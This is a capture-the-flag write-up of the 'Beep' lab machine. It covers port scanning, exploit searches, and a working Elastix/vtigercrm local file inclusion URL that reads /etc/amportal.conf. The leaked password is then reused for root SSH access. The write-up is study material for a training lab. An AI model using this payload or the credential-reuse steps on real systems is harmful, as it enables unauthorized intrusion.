Beep

Personal Rating: Easy

Enumeration

sudo nmap -sV -sC -p- <IP>

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: LOGIN-DELAY(0) USER UIDL PIPELINING STLS EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES TOP APOP AUTH-RESP-CODE
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            790/udp   status
|_  100024  1            793/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ANNOTATEMORE MULTIAPPEND RENAME Completed IMAP4rev1 CONDSTORE UIDPLUS ACL THREAD=ORDEREDSUBJECT X-NETSCAPE UNSELECT IMAP4 LISTEXT NAMESPACE URLAUTHA0001 STARTTLS THREAD=REFERENCES OK SORT CATENATE SORT=MODSEQ ATOMIC CHILDREN NO IDLE BINARY RIGHTS=kxte LIST-SUBSCRIBED ID QUOTA LITERAL+ MAILBOX-REFERRALS
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2023-12-08T12:48:17+00:00; +4s from scanner time.
793/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.570

Port 80/443:

http://10.10.10.7 redirects to the https version and shows this

The default creds of admin:palosanto did not work.

The SSL certificate only shows root@localhost.localdomain but nothing interesting here

/var is listable and shows Apache/2.2.3 (CentOS)

Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh

I do not know how this one works, that I found with searchsploit.

The last one looks interesting, so I will try that. It exists in metasploit: unix/http/freepbx_callmenumsear #This did not work

Lets try the LFI: https://github.com/daniboomberger/elastix_lfi

This payload worked! https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Port 10000:

This shows a very simple login page

feroxbuster -k -u https://10.10.10.7:10000/ -x cgi,sh,php,js,pl,rb

https://10.10.10.7:10000/session_login.cgi
https://10.10.10.7:10000/xmlrpc.cgi

The cgi component is very interesting. I might try shellshock/os command injection and search for more scripts.

Testing with metasploit, this does not seem to be vulnerable to Shellshock at first glance.

The page seems to be running Webmin, but I do not know the version.

Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)

https://github.com/squid22/Webmin_CVE-2019-15107 #Did not work because of ssl being used here.

Port 5038:

With a quick search on searchsploit and Exploitdb I only found DOS attacks

Port 4559:

Elastix LFI

This payload worked to get a config file:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

AMPDBUSER=asteriskuser
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE

This worked to log in!

We now see some versions:

• elastix 2.2.0

• postfix 2.3.3

• cyrus-imapd 2.3.7

• asterisk 1.8.7.0

• hylafax 4.3.10

• freePBX 2.8.1

Asterisk has a CLI and a file editor:

This certainly is interesting:

We have some sort of secret here

/dundi/secret : d0gMQ9A8XD+JSC4wEhclJQ==;8Ja1RzCJwA6g+tgYZ7j9Lw==

Root Access

I want to try ssh with the credentials we got:

https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0

https://stackoverflow.com/questions/69875520/git-error-no-matching-host-key-type-found-their-offer-ssh-rsa

This worked:

ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1 -o HostKeyAlgorithms=+ssh-rsa root@10.10.10.7

password: jEhdIekWmdjE

The key takeaway is to always try the simple things first. Just check searchsploit for the simple exploits, try the ones that make sense and if you have any credentials, try them out with ssh with all usernames you know. Always work from simple to complex to not miss an easy win.